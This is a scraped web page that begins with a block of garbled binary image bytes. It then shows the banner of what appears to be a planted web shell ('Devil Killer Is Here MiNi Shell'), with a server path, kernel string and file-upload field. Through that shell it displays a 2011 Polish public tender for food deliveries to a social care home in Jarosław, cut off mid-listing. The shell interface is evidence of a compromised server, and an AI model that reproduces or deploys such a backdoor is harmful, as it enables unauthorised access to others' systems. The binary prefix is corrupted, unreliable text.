JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111201/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111201/405766-N-2011.html

<p class="kh_header"><b>Jarosław: Przedmiotem zamówienia jest sprzedaż i dostawa artykułów spożywczych na potrzeby DOMU POMOCY SPOŁECZNEJ W JAROSŁAWIU
w kategoriach:I.PIECZYWO 15810000-9 II.PRODUKTY MLECZARSKIE 15500000-3
III.MIĘSA I WYROBY GARMAŻERYJNE 15110000-2 15130000-8 IV.DRÓB ŚWIEŻY I PODROBY 15112100-7 15114000-0 V.RÓŻNE PRODUKTY SPOŻYWCZE 15800000-6
VI.MROŻONE OWOCE, WARZYWA I RYBY CPV 15330000-0; 15220000-6 VII.JAJA 03142500-3 VIII.OWOCE, WARZYWA I PODOBNE PRODUKTY 15300000-1
według zestawienia stanowiącego Załącznik Nr 1 do specyfikacji</b><br>
<b>Numer ogłoszenia: 405766 - 2011; data zamieszczenia: 01.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , pl. Mickiewicza 4, 37-500 Jarosław, woj. podkarpackie, tel. 0-16 624-37-80, faks 0-16 624-37-80.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jaroslaw.domypomocy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Budżetowa Starostwa Powiatowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest sprzedaż i dostawa artykułów spożywczych na potrzeby DOMU POMOCY SPOŁECZNEJ W JAROSŁAWIU
w kategoriach:I.PIECZYWO 15810000-9 II.PRODUKTY MLECZARSKIE 15500000-3
III.MIĘSA I WYROBY GARMAŻERYJNE 15110000-2 15130000-8 IV.DRÓB ŚWIEŻY I PODROBY 15112100-7 15114000-0 V.RÓŻNE PRODUKTY SPOŻYWCZE 15800000-6
VI.MROŻONE OWOCE, WARZYWA I RYBY CPV 15330000-0; 15220000-6 VII.JAJA 03142500-3 VIII.OWOCE, WARZYWA I PODOBNE PRODUKTY 15300000-1
według zestawienia stanowiącego Załącznik Nr 1 do specyfikacji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sprzedaż i dostawa artykułów spożywczych na potrzeby DOMU POMOCY SPOŁECZNEJ W JAROSŁAWIU
w kategoriach:I.PIECZYWO 15810000-9 II.PRODUKTY MLECZARSKIE 15500000-3
III.MIĘSA I WYROBY GARMAŻERYJNE 15110000-2 15130000-8 IV.DRÓB ŚWIEŻY I PODROBY 15112100-7 15114000-0 V.RÓŻNE PRODUKTY SPOŻYWCZE 15800000-6
VI.MROŻONE OWOCE, WARZYWA I RYBY CPV 15330000-0; 15220000-6 VII.JAJA 03142500-3 VIII.OWOCE, WARZYWA I PODOBNE PRODUKTY 15300000-1
według zestawienia stanowiącego Załącznik Nr 1 do specyfikacji
zamówienia realizowane będą sukcesywnie w okresie od 01.01.2012 do 30.06.2012.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni w/w warunek jeżeli prowadzi działalność gospodarczą w zakresie objętym niniejszym zamówieniem, co potwierdza stosownym odpisem</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować właściwym środkiem transportu do dostawy artykułów spożywczych danej kategorii oraz posiadać wdrożony system HACCP, co potwierdza stosownym oświadczeniem.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o spełnianiu wymogów wynikających z systemu HACCP zgodnie z Rozporządzeniem (WE) nr 852/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004 w sprawie higieny środków spożywczych oraz Ustawy z dnia 25 sierpnia 2006r o bezpieczeństwie żywności i żywienia (Dz.U. z 2006r Nr 171, poz. 1225). Dla wykonawców kategorii III Mięsa i wyroby garmażeryjne oraz IV Drób świeży i podroby - Aktualna decyzja lub zaświadczenie właściwego Państwowego Powiatowego Inspektora Sanitarnego lub Powiatowego Inspektora Weterynarii stwierdzające dopuszczenie wykonawcy do obrotu handlowego mięsem i wędlinami, wystawione lub poświadczone nie wcześniej niż 6 m-cy przed terminem składania ofert</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jaroslaw.domypomocy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej
Plac Mickiewicza 4
37-500 Jarosław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.12.2011 godzina 09:00, miejsce: Dom Pomocy Społecznej
Plac Mickiewicza 4
37-500 Jarosław
Administracja.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb pszenno-żytni, krojony (0,9-1kg ) - 3.000kg, Chleb pszenny, krojony (0,5-1kg ) - 1.500kg, Bułki pszenne 100g - 7.000szt, Chleb razowy krojony - 550kg, Rogale słodkie - 1.000  szt, Bułka tarta - 40kg, Bułki drożdżowe z nadzieniem słodkim( w tym dżem, ser, czekolada, mak, jagoda, budyń )100-150g - 2.000 szt, Babka drożdżowa z rodzynkami - 150kg, Pączki z nadzieniem - 300szt, Bułki drożdżowe z kapustą 100-150g - 1.500szt, Bułki drożdżowe z ziemniakami i kaszą 100-150g - 1.500 szt, Cebulaki - 600szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PRODUKTY MLECZARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko pasteryzowane 3,2 % 1l - 4.000l, Śmietana 18% folia ( 0,5-1l ) - 450l, Śmietana 30% - 20l, Masło z zawartością tłuszczu zwierzęcego min. 82% - 800kg, Ser biały półtłusty (1kg-2kg) -500kg, Ser żółty typu edamski - 60kg, Ser żółty typu salami- 40kg, Ser żółty wędzony - 20kg, Ser topiony smakowy 100g - 130kg, Ser fromage do 100g - 36kg, Jogurt owocowy (150-250g )- 150l, Jogurt naturalny b/c (150-250g) - 30l, Maślanka folia 1l - 400l, Kefir kubek (200g-250g ) - 300l, Serek biały z dodatkami do smarowania pieczywa (100g-200g )-30kg, Serek homogenizowany słodki lub z owocami (100g-200g) -150kg, Serek biały ziarnisty (100g-200g) - 80kg, Ser Feta - 5kg, Ser Mozarella 5kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> MIĘSA I WYROBY GARMAŻERYJNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kiełbasa zwyczajna - 150kg, Kiełbasa mortadela - 80kg, Kiełbasa żywiecka wieprzowa -100kg, Kiełbasa szynkowa - 80kg, Kiełbasa kminkowa lub inna z przyprawami - 80kg, Kiełbasa firmowa - 20kg, Kiełbasa wiejska - 100kg, Kiełbasa golonkowa - 30kg, Kiełbasa kanapkowa - 30kg, Szynka wieprzowa - 60kg, Szynka wiejska - 90kg, Polędwica wieprzowa gotowana - 40kg, Boczek wędzony gotowany - 30kg, Baleron - 50kg,  Lencz - 70kg, Kiszka gryczana - 80kg, Pasztetowa wieprzowa - 70kg, Pasztet zapiekany - 100kg, Salceson wieprzowy - 70kg, Słonina - 30kg, Smalec - 15kg, Kości wieprzowe cięte - 300kg, Kości wędzone - 10kg, Karkówka b/k - 200kg, Udziec wołowy - 50kg, Metka - 250kg, Nogi wieprzowe - 40kg, Rosół tani, szponder - 15kg, Rosół drogi , rostbef - 40kg, Schab bez kości -90kg, Schab faszerowany - 30kg, Parówkowa - 200kg, Wątroba wieprzowa - 60kg, Biodrówka - 15kg, Mięso od szynki - 90kg, Kiełbasa biała - 60kg, Kiełbasa grillowa - 20kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> DRÓB ŚWIEŻY I PODROBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Żołądki drobiowe ( świeże) - 30kg, Udka drobiowe ( świeże) - 250kg, Filet z kurczaka ( świeży) 100kg, Filet z indyka (świeży) - 60kg, Kurczak ( świeży) - 50kg, Wątroba drobiowa ( świeża) - 70kg, Kiełbasa drobiowa - 20kg, Salceson z indyka - 30kg, Szynka drobiowa - 20kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.21.00-7, 15.11.40.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> RÓŻNE PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas kawałki (340g-500g ) - 15kg, Barszcz biały w proszku (30g-60g) - 3kg, Baton z nadzieniem owocowym (50g-80g)- 200szt, Bazylia (10g-20g) - 0,8 kg, biszkopty (150g-250g) - 10kg, Brzoskwinia w syropie (500g - 850g) - 40kg, Budyń (40g - 65g) - 40 kg, Bulion drobiowy w kostkach (60g-120g) - 2,5kg, Bulion grzybowy w kostkach (60g-120g) - 2,5kg, Bulion warzywny w kostkach (60g-120g) - 2,5kg, Chrzan tarty (270-300g) - 20kg, Ciastka b/ c kruche (80g-100g) - 3kg, Ciastka b/c wafle (80g-100g ) - 8kg,  Ciastka herbatniki w czekoladzie - 25kg, Ciastka kruche z marmoladą - 30kg, Ciastka typu markiz - 20kg, Ciastka z galaretką typu delicje  - 30kg, Cukier kryształ (0,5-1kg) - 950kg, Cukier puder (0,5-1kg) -10kg, Cukier waniliowy (16g- 32g) - 2,5kg, Cukierki czekoladowe - 20kg, Cynamon (10g-20g)- 0,4kg, Czekolada b/c  (80g-100g) - 8kg, Czekolada nadziewana 100g -20kg, Drożdże (0,5kg - 1kg) - 5kg, Dżem owocowy (0,9 - 1kg) - 200kg,  Filet z makreli w oleju 170g - 200szt,  Filet z makreli w pomidorach 170g- 200szt, Galaretka owocowa (80g-90g ) - 10kg, Galaretka w czekoladzie 15kg, Groch połówki (0,25kg - 1kg) -15kg, Groszek konserwowy 400g - 30kg, Gulasz angielski 300g - 400szt, Herbata liściasta 100g - 50kg, Kakao ciemne (0,25-1kg) -4kg, Kasza gryczana (0,5 -1kg) - 70kg, Kasza jęczmienna (0,5 - 1kg) - 70kg, Kasza kukurydziana (0,5 -1kg) - 40kg, Kasza manna (0,5kg- 1kg)- 70kg, Kawa naturalna (0,5 - 1kg) - 2kg, Kawa zbożowa (0,5 - 1kg) - 14kg, Ketchup ( 0,5l- 1l) - 80kg, Kisiel owocowy (45g - 65g) - 30 kg, Kminek (10g - 20g) - 1,8kg, Koncentrat buraczany (300ml- 380 ml) -10l, Koncentrat pomidorowy 30% (0,9 kg - 1kg) - 40kg , Krem orzechowy do smarowania( 380g-400g) - 40kg, Kukurydza konserwowa 400g - 35kg, Kwasek cytrynowy (10g 20g) - 1,5kg, Liść laurowy (10g - 20g )- 0,5kg, Majeranek (10g-20g) - 0,5kg, Majonez 1000g - 100kg, Makaron łazanka (0,25-1kg) - 70kg, Makaron muszelka (0,25-1kg) - 30kg, Makaron nitka (0,25-1kg) - 60kg, Makron świderki (0,25-1kg) - 300kg, Makaron wstążka falowana (0,25- 1kg) - 30kg, Makaron zacierka (0,25-1kg) - 50kg, Margaryna mleczna 250g - 60kg, Marmolada 1000g -30kg, Mak suchy niebieski (250g-500g) - 1,5kg, Mąka pszenna tortowa 1kg - 130kg, Mąka pszenna zwykła 1kg typ 500- 350kg, Mąka ziemniaczana (0,5- 1kg) - 30kg, Miód prawdziwy 400g - 50kg,Mleko zagęszczone słodzone 533g- 25kg,  Musztarda stołowa (0,5kg - 1kg) - 40kg, Ocet 0,5l - 10l, Ocet winny (0,5-1l) - 1l, Ogórek konserwowy (500g- 1000g) - 60kg, Oliwa z oliwek 1l - 1l, Olej słonecznikowy 1l - 250l, Oregano (10g-20g) - 0,3kg, Papryka marynowana( 400g-900g)- 40kg, Papryka słodka (10g-20g)- 2kg, Paprykarz 300g- 130szt, Pasztecik drobiowy( 130g-135g) -1300szt, Pieczarka marynowana ( 400g-900g) - 30kg, Pieprz ( 10g-20g) - 2kg, Pieprz ziołowy (10g-20g) - 2kg, Pierniczki w czekoladzie nadziewane - luz - 20kg, Pierniczki nadziewane lukrowane - luz - 20kg, Płatki kukurydziane ( 0,25-1kg) - 30kg, Płatki owsiane górskie ( 0,25-1kg)- 50kg, Pomidory w puszce 400g - 70kg, Powidło 1000g - 40kg, Proszek do pieczenia (16g-32g) - 1kg, Przyprawa  w proszku do mięsa typu delikt do  1kg - 6kg, Przyprawa do zup i sosów w proszku typu ziarenka smaku do 1kg - 15kg, Przyprawa do zup w płynie 1l - 50l, Przyprawa do ryb do 0,5-0,5kg, Przyprawa do mięsa mielonego do 0,5-0,5kg, Przyprawa Curry 20g - 0,2kg, Rodzynki 100g - 2kg, Ryż (0,5-1kg) - 180kg, Sałatka z buraczków i papryki do 1kg - 20kg, Sałatka z kapustą i warzywami do 1kg, - 50kg, Sałatka z ogórków krojonych do 1kg, - 30kg, Seler marynowany ( 400g-1kg) - 20kg, Sok pomarańczowy 2l - 15szt,  Sok Jabłkowy 2l -15szt, Sok marchwiowo-owocowy (0,3l-0,4l) - 1200szt, Sok owocowy b/c (200ml - 300ml) - 60szt, Sok wieloowocowy 2l - 15szt, Sok z czarnej porzeczki 2l - 15szt, Soki zagęszczone do herbaty extrakt min 60% (04l -0,5l) - 20l, Sos pieczarkowy ( 30g-50g) - 2kg, Sos pieczeniowy ( 30g-50g) - 3kg, Sos pomidorowo-paprykowy( 30g-50g) - 4kg, Sos sałatkowy 9g- 5kg, Sól (0,5-1kg) 200kg, Szprot w pomidorach 170g - 150szt, Szynka wieprzowa konserwowa 910g - 33kg, Śledzie w oleju marynowane ( 2kg-3kg) - 70kg, Śliwka wędzona 100g - 2kg, Tuńczyk w oleju w kawałkach dużych 185g- 600szt, Wafelek czekoladowy 50g,- 200szt, Wafelek śmietankowy 50g - 100szt, Wafelki czekoladowe - luz - 20kg, Wafelki śmietankowe - luz 10kg, Wafle tortowe suche 200g - 50szt, Wiórki kokosowe 100g - 1kg,   Ziele angielskie ( 10g - 20g) 1kg, Zioła prowansalskie ( 10g-20g) 1kg, Zupa cebulowa w proszku (35g-60g) - 3kg, Zupa grochowa w proszku ( 35g-60g) - 3kg, Zupa grzybowa w proszku (35g- 60g) - 3kg, Zupa ogonowa w proszku ( 35g-60g) - 4kg, Zupa pieczarkowa w proszku ( 35g-60g)- 3kg, Żurek ( 0,5-1l) 40l..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> MROŻONE OWOCE, WARZYWA I RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kalafior ( 0,45kg - 2,5kg)  - 60kg, Bukiet jarzyn ( 0,45 - 2,5kg) - 130kg, Mieszanka kompotowa ( 0,45-2,5kg) - 20kg, Truskawka  ( 0,45-2,5kg)- 30kg, Fasolka szparagowa zielona ( 0,45-2,5kg)- 50kg,  Brokuły ( 0,45kg-2,5kg) - 60kg, Wiśnia b/pestki ( 0,45-2,5kg) - 20kg, Ryba panga - płaty - 120kg, Ryba mintaj - kostki - 30kg, Fasola szparagowa żółta ( 0,45-2,5kg) - 20kg, Brukselka ( 0,45-2,5kg) - 30kg, Mieszanka chińska ( 0,45-2,5kg) - 40kg, Lody owocowe  200ml - 250 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0, 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> JAJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja świeże  L- 10.000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
